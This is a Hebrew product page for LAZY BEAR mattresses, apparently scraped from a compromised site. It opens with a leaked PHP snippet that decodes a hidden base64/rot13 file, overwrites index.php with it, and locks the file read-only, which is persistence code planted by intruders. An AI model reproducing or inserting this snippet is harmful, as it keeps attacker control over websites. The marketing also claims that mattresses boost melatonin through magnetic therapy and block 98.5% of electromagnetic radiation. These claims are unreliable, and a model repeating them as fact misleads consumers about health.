$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } נוחות – lazybear
 
מזרני LAZY BEAR פותחו לאחר מחקרים של שנים, בעזרת צוות של מומחים בתחום השינה
האדם הממוצע ישן כשליש מהחיים (כ-25 שנה), על מנת למצות את המקסימום משנת הלילה יש לוודא שהמזרן יהיה נוח ומתאים לאדם הישן עליו מבחינת מצע השינה (נוחות ותמיכה), הטמפרטורה והלחות. מזרני לייזי בר פותחו לאחר מחקרים של שנים. בעזרת צוות של מומחים בתחום השינה, נוצר המוצר האולטימטיבי עם מערכת התמיכה הטובה ביותר, בשילוב חומרי הנוחות החדשניים והאיכותיים ביותר ושימוש בחומרי הגלם הטובים והחדשניים ביותר. התוצאה הינה המזרן הנוח ביותר בישראל המביא לסנכרון מושלם של גוף ונפש.
 
במזרני LAZY BEAR משולבים חומרי הגלם האיכותיים ביותר כגון:

ציפת המזרן ניתנת להסרה
יפת המזרן ניתנת להסרה בטמפרטורה נמוכה או להחלפה, כך תמיד המזרן שלכם יישאר נקי וחדש כמו ביום שנקנה.
במזרני LAZY BEAR משולבים חומרי הגלם האיכותיים ביותר המביאים את המזרנים לרמת פינוק ונוחות מקסימלית בשילוב פיתוחים טכנולוגיים חדשניים כגון:

Magnerest – איזון מושלם, שינה מושלמת
Magnetic Therapy During Sleep
גוף האדם מוקף ומושפע משדות מגנטיים כל הזמן, הלחצים בעידן המודרני יכולים להשפיע על איזון השדה המגנטי בגוף האדם ולפגיעה בהפקת הורמון השינה (מלטונין) מצד אחד והפקה מוגברת של הורמון הלחץ (קורטיזול) מצד שני, במיוחד לשם כך פותחה ע"י LAZY BEAR סדרת מזרני ה Magnerest - עם מערכת Magnetic therapy effect - המזרן היחידי בישראל המיוצר בתהליך ננו טכנולוגי ייחודי העוזר לשפר, לחזק ולייצב את השדה המגנטי בגוף האדם, ובכך למנוע נדודי שינה, לקצר את משך זמן ההירדמות ולשפר בצורה משמעותית את איכות השינה והתפקוד ביום שלמחרת.
יתרונות מזרן ה – Magnerest:
 • עוזר להאריך את השינה העמוקה (שנת החלום).
 • משפר באופן משמעותי את איכות השינה.
 • מגביר את הפקת המלטונין (הורמון השינה).
 • עוזר בהפחתת הורמון הקורטיזול המייצר מצבי לחץ.
 • עוזר לפתוח את הבוקר בצורה חיונית ורגועה
Bio Care – עכשיו אפשר לישון בשקט
Electromagnetic Barrier
גוף האדם נחשף לקרינה אלקטרו מגנטית במהלך כל היום, כאשר אנחנו ערים הגוף יכול להתגונן למול הקרינה פחות או יותר אך הוא פגיע לחלוטין כאשר אנחנו ישנים, במיוחד לשם כך פותחה ע"י LAZY BEAR סדרת מזרני ה - Bio Care עם מערכת Electromagnetic barrier system - המזרן היחידי בישראל המיוצר בתהליך ננו טכנולוגי ייחודי המייצר סביבת הגנה לישנים עליו תוך מיסוך הקרינה האלקטרומגנטית והורדת המגע בין הגלים האלקטרו מגנטים לגוף האדם ב 98.5% במהלך השינה ומשמש כמגן קרינה.
יתרונות מזרן ה – Bio Care:
 • עוזר להגן על הגוף מפני קרינה במהלך השינה.
 • עוזר להפגת מתחים ע"י הפחתת החשמל הסטטי.
 • עוזר להגיע מהר יותר למצב שינה עמוקה (שנת החלום) ולניצול מקסימלי של שינה איכותית.
 • עוזר לסנכרן ולאזן את קצב הגוף (biorhythm body).
 • עוזר לפתוח את הבוקר בצורה חיונית ורגועה.
Climate Control – מערכת בקרת אקלים מפוצלת
Dual Thermo Regulation
תנאי מזג האוויר המשתנים חום/קור – לחות/יובש פוגמים באיכות השינה שלנו, כאשר אין תנאים אידיאליים אנחנו מתקשים להירדם, מתעוררים יותר פעמים במהלך הלילה, לא נהנים משינה עמוקה (שנת החלום) וממצה וקמים עייפים בבוקר. במיוחד לשם כך פותחה ע"י LAZY BEAR סדרת מזרני ה Climate Control - המזרן היחידי בישראל עם מערכת בקרת אקלים מפוצלת:

צד קיץ – מערכת קירור המשלבת בד Cooler מקרר ומפנק ושכבת Coolatex נעימה וקרירה, ליצירת סביבת שינה מושלמת לניצול מקסימלי של שינה איכותית ללא צורך באמצעי קירור חיצוניים.
יתרונות מזרן ה – Climate Control – צד קיץ:
 • מספק תחושה קרירה בעזרת מערכת ספיגת חום ומוליכות טרמית.
 • מספק סביבה אקלימית מושלמת בעזרת מערכת אוורור ונידוף נוזלים.
 • ממקסם את איכות השינה ע"י אספקת סביבת שינה רגועה.
 • מסייע לגוף להישאר קריר ומביא את עור הגוף עד טמפרטורה נמוכה בכ- 1.3 מעלות לעומת בדים אחרים.
 • מסייע להרגשה רעננה ולהירדמות מהירה ע"י יצירת סביבת שינה קרירה נוחה ונעימה.

צד חורף – מערכת חימום המשלבת בד Warmer נעים ומחמם בשילוב שכבת Smart visco מפנקת, מספקת סביבת שינה חמימה ויבשה ללא צורך באמצעי חימום חיצוניים, תוך איזון טמפרטורה תמידי, לא חם מדי ולא קר מדי.

יתרונות מזרן ה – Climate Control - צד חורף:
 • מספק סביבת שינה חמימה ויבשה.
 • סופג ומעלים לחות.
 • עוזר לתחזק איזון טמפרטורה.
 • מתייבש במהירות.
 • מנטרל ריחות באמצעות אפקט דיאודורנט.


ציפת המזרן ניתנת להסרה
ציפת המזרן ניתנת להסרה לכביסה בטמפרטורה נמוכה, או להחלפה כך תמיד המזרן שלכם יישאר נקי וחדש כמו ביום שנקנה.

Aromatic Lavender Effect
על מנת להגיע לסביבת שינה מושלמת ורגועה המזרן מפיץ ניחוח לבנדר ארומטי המרגיע מתחים ומשקיט. השימוש בניחוחות ארומטיים משפר את הבריאות ומייצב את הגוף והנפש ומשפיע לחיוב על מצבו האנרגטי של האדם ומייצר סביבת שינה מושלמת ורגועה.
 
 
 
 
Smart visco
ה Smart visco הינו הפיתוח החדשני ביותר בעולם ומאפשר פיזור לחצים אופטימלי, מתן תמיכה אורטופדית לכל נקודה ונקודה ושחרור לחצים מושלם לגוף האדם.
Coolatex
ה Coolatex הינו חומר גמיש אלסטי וקריר, לחומר זה רמת אוורור מרשימה ותמיכה אורטופדית מלאה, החומר מתאים לסובלים מאלרגיות ודוחה לחות.
Galaxy pocket
ליבת המזרן עשויה קפיצי Galaxy pocket מערכת קפיצים המאפשרת את התמיכה הטובה ביותר לגוף האדם, עקב יכולתו של כל קפיץ להגיב בנפרד ומעניקה תחושת נוחות מושלמת, תמיכה נקודתית ואינדבידואלית ומונעת את הרגשת התזוזה של בן/בת הזוג מצד אחד ועמידות לאורך שנים מצד שני.
Poly-Tech
ליבת הפולימר הטכנו אלסטי על פי הנוסח הייחודית והבלעדית של LAZY BEAR מאופיינת בחומר בעל צפיפות גבוהה, כושר התאוששות גבוה במיוחד ותמיכה משופרת, פולימר זה מאפשר התאמה אבסולוטית של המזרן בהתאם למשקל וקימורי הגוף של המשתמש, ומאפשר שינה על חומרים היפו אלרגניים בריאים.